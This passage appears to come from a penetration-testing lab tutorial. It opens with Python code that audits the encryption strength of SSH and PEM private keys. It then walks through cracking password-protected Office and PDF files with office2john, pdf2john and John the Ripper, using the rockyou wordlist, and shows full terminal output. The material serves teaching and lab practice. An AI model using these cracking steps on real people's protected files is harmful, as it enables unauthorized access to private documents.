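    elif lines[0].startswith("-----BEGIN") and lines[0].endswith("PRIVATE KEY-----"):
        headers = dict(l.split(":", 1) for l in lines[1:] if ":" in l and not l.startswith("-----"))
        encrypted = headers.get("Proc-Type", "").strip() == "4,ENCRYPTED"
        cipher = headers.get("DEK-Info", "").strip().split(",")[0] or "none"
        # Legacy PEM keys derive the key with OpenSSL's single MD5 pass (john's cost 0).
        info = {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "md5-1-pass" if encrypted else "none", "rounds": 1 if encrypted else None}
    else:
        raise ValueError("unrecognised key file")

    if not info["encrypted"]:
        info["verdict"] = "unencrypted"
    elif info["kdf"] != "bcrypt":
        info["verdict"] = "weak: legacy MD5 key derivation, cheap to guess offline"
    elif info["rounds"] < MIN_BCRYPT_ROUNDS:
        info["verdict"] = f"weak: bcrypt rounds {info['rounds']} below {MIN_BCRYPT_ROUNDS}"
    else:
        info["verdict"] = "ok"
    return info


def build_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16) -> str:
    """Constructed openssh-key-v1 file: real header fields, dummy key sections."""
    salt = b"\x5a" * 16  # fixed rather than random because this is a sample
    kdfopts = (_sstring(salt) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    body = AUTH_MAGIC + _sstring(cipher) + _sstring(kdf) + _sstring(kdfopts)
    body += struct.pack(">I", 1) + _sstring(b"dummy-public-key") + _sstring(b"\x00" * 64)
    b64 = base64.b64encode(body).decode()
    return "\n".join([OPENSSH_BEGIN] + [b64[i:i + 70] for i in range(0, len(b64), 70)] + [OPENSSH_END])


def build_legacy_key(encrypted=True) -> str:
    """Constructed PEM 'RSA PRIVATE KEY' with the optional OpenSSL encryption headers."""
    hdr = "Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n" if encrypted else ""
    body = base64.b64encode(b"\x00" * 48).decode()
    return f"-----BEGIN RSA PRIVATE KEY-----\n{hdr}{body}\n-----END RSA PRIVATE KEY-----\n"


if __name__ == "__main__":
    for sample in (build_legacy_key(), build_openssh_key(), build_openssh_key(cipher=b"none", kdf=b"none")):
        print(classify_private_key(sample))
```

Keys that come back as legacy-pem or unencrypted are the ones to rotate first; re-encrypting an existing key into the bcrypt container is a matter of ssh-keygen -p with the -o and -a options on OpenSSH releases that still accept the old format.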

Cracking Microsoft Office Documents

ammar@htb[/htb]$ office2john.py Protected.docx > protected-docx.hash
ammar@htb[/htb]$ cat protected-docx.hash

Protected.docx:$office$*2007*20*128*16*7240...SNIP...8a69cf1*98242f4da37d916305d8e2821360773b7edc481b

ammar@htb[/htb]$ john --wordlist=rockyou.txt protected-docx.hash

Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (Protected.docx)
1g 0:00:00:00 DONE (2022-02-08 01:25) 2.083g/s 2266p/s 2266c/s 2266C/s trisha..heart
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Cracking PDFs

ammar@htb[/htb]$ pdf2john.py PDF.pdf > pdf.hash
ammar@htb[/htb]$ cat pdf.hash

PDF.pdf:$pdf$2*3*128*-1028*1*16*7e88...SNIP...bd2*32*a72092...SNIP...0000*32*c48f001fdc79a030d718df5dbbdaad81d1f6fedec4a7b5cd980d64139edfcb7e

ammar@htb[/htb]$ john --wordlist=rockyou.txt pdf.hash

Using default input encoding: UTF-8

Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (PDF.pdf)
1g 0:00:00:00 DONE (2022-02-08 02:16) 25.00g/s 27200p/s 27200c/s 27200C/s bulldogs..heart
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed
Thanks